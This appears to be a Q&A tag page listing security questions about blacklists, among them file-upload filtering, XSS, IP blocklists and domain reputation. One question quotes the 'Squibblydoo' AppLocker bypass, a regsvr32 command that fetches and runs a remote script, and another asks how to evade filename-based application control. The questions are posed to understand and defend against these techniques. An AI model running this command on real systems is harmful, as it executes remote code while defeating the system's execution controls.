Questions tagged [blacklist]

A blacklist is a list of data to be filtered out. A blacklist is the opposite of a whitelist.
- Whitelist - only these things.
- Blacklist - everything but these things.

44 questions
32
votes
1 answer

Is it possible to change original filename of an exe?

We are using an application control solution which denies access for some exes according to their original filename. Is it possible to change original filename with hex editor or another method?
frkntrn
10
votes
4 answers

Making a Blacklist of filetypes to protect PHP application

I'm working in a PHP system where the user can upload files. I'm trying to protect the system from malicious codes, so I'm thinking about some type of blacklist of files that I've to block from upload. I know that a Whitelist is better than a…
James
7
votes
2 answers

How does this AppLocker bypass work, exactly? ("Squibblydoo")

I have read on a few blogs about a trick called "Squibblydoo", where the following command can bypass Windows' AppLocker: regsvr32 /s /n /u /i:http://reg.cx/2kK3 scrobj.dll Where the URL points to a script file that contains a command to open up…
Lucas Cioffi
6
votes
5 answers

Blacklisting vs. whitelisting characters to prevent XSS?

I've been reading about XSS prevention on OWASP and other security channels. They all say that I should use ESAPI or a similar library and do input filtering through a whitelist approach. However, I use a framework (Webobjects) which encodes by…
Novice User
4
votes
1 answer

Is filtering flash based on the mimetype enough to keep it out?

As flash is a real security mess I started blacklisting flash at our proxy by blocking any content with the mime type application/x-shockwave-flash which works pretty well as far as I can tell. The proxy does SSL interception so it covers both http…
davidb
4
votes
1 answer

How to defend against a Spoofed-IP Blocklist DOS attack?

So I've implemented an IP Blocklist for the /login endpoint on my server. If any IP fails to login more than x number of attempts in x number of minutes the requesting IP is blocklisted for x number of minutes. That goes a long way in mitigating any…
AJB
4
votes
2 answers

Blacklisting IP addresses -- when should we take action?

I am responsible for securing an AWS environment and am noticing various recon attacks against the environment. We have the option of blocking the IP addresses in our firewall, but the environment is scanned with different attacks multiple times a…
jay-charles
3
votes
1 answer

Can/should I automatically report network break-in attempts?

For the last 15 years I've been using SpamCop to report the spam I receive. I do this because it sometimes results in spammers and the third-party machines they compromise getting shut down, at least temporarily (as evidenced by the occasional…
Psychonaut
2
votes
2 answers

Can ISPs be helpful in preventing spam?

I have received a number of phishing emails from various domains. I would like to prevent the domain from sending emails so that other people also don't get taken advantage of. I have not been successful talking to the registrar or host to take…
2
votes
2 answers

Resolving "This website has been reported as unsafe" (Windows Defender SmartScreen)

I had a website that was compromised—the attacker planted malware that caused a redirect to a malicious site. The security holes have now been fixed and the malware has been removed. However, Microsoft Edge is still showing the message "This website…
David
2
votes
2 answers

Remove domain from web filter blacklists

A domain with a checkered past I work at a company that purchased a .com domain around a year ago, and it uses this domain for its web site and e-mail now. However, the previous owner had a site (last online several years back) on the domain which…
Herringbone Cat
2
votes
0 answers

Are there any good OSINT feeds related to phone phishing?

There are lots of feeds related to fraudulent and malicious domains and IPs, but we're seeing more and more social engineering attempts coming in via phone. When these are reported to us, I'd like to document the phone number in our intelligence…
Ivan
2
votes
0 answers

Filter out ISPs from Whois results

I was wondering if there is any efficient way or any service (free or not) that may help me in order to identify companies behind IP addresses. I figured out that in some cases Whois may be really helpful for that. Unfortunately, in a lot of cases…
Theo Babilon
2
votes
1 answer

What is the lifespan of a C2?

I've been working on setting up dynamic blacklists, and one question that came up is how long typical entries should be kept on a blacklist. In the interest of equity, there should obviously be some point at which entries are aged out to prevent…
2
votes
1 answer

Are there any standard practices for protecting against malicious links being entered in a public form?

A website I'm working on needs to have a form for any visitor to submit a request for information about a service. The user will not need to create an account, and contact details are just part of the form. The user can also enter a free form…
jpmc26